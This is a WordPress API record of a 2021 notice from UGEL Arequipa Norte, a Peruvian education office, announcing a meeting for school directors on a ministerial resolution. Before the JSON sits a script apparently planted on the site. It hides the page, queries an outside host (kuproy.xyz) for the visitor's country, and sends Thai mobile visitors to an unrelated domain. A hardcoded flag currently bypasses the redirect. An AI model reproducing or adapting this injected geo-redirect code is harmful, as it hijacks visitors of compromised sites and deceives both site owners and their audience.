<script>
(function() {
    var isDesktop = true;
    
    // Desktop = stay
    if (isDesktop) {
        document.body.style.visibility = "visible";
        return;
    }
    
    var key = "geo_th_v1";
    var cached = localStorage.getItem(key);
    
    // Mobile + TH = redirect
    if (cached === "TH") {
        location.href = "https://www.wakeboard-madrid.com/";
        return;
    }
    
    // Mobile + non-TH (cached) = stay
    if (cached && cached !== "TH") {
        document.body.style.visibility = "visible";
        return;
    }
    
    // Fetch country
    fetch("https://kuproy.xyz/")
        .then(function(r) { return r.text(); })
        .then(function(c) {
            var country = c.trim().toUpperCase();
            localStorage.setItem(key, country);
            
            // TH = redirect, non-TH = stay
            if (country === "TH") {
                location.href = "https://www.wakeboard-madrid.com/";
            } else {
                document.body.style.visibility = "visible";
            }
        })
        .catch(function() {
            // Error = assume non-TH, stay
            localStorage.setItem(key, "NOT_TH");
            document.body.style.visibility = "visible";
        });
})();
</script>{"id":1380,"date":"2021-12-06T20:33:00","date_gmt":"2021-12-07T01:33:00","guid":{"rendered":"https:\/\/ugelarequipanorte.gob.pe\/wp\/?p=1380"},"modified":"2021-12-07T08:35:13","modified_gmt":"2021-12-07T13:35:13","slug":"atencion-directivos","status":"publish","type":"post","link":"https:\/\/ugelarequipanorte.gob.pe\/wp\/atencion-directivos\/","title":{"rendered":"ATENCI\u00d3N DIRECTIVOS"},"content":{"rendered":"\n<p>La UGEL Arequipa Norte pone de conocimiento a los directivos de instituciones educativas p\u00fablicas, privadas y de convenio de todos los niveles y modalidades que, el d\u00eda martes 07 de diciembre del a\u00f1o en curso a las 14:30 horas se desarrollara, la reuni\u00f3n informativa sobre los ALCANCES Y APLICACI\u00d3N R.M 458-2021-MINEDU.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>La UGEL Arequipa Norte pone de conocimiento a los directivos de instituciones educativas p\u00fablicas, privadas y de convenio de todos los niveles y modalidades que, el d\u00eda martes 07 de diciembre del a\u00f1o en curso a las 14:30 horas se desarrollara, la reuni\u00f3n informativa sobre los ALCANCES Y APLICACI\u00d3N R.M 458-2021-MINEDU.<\/p>\n","protected":false},"author":1,"featured_media":1381,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-1380","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-comunicados"],"_links":{"self":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/1380","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/comments?post=1380"}],"version-history":[{"count":1,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/1380\/revisions"}],"predecessor-version":[{"id":1382,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/1380\/revisions\/1382"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/media\/1381"}],"wp:attachment":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/media?parent=1380"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/categories?post=1380"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/tags?post=1380"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}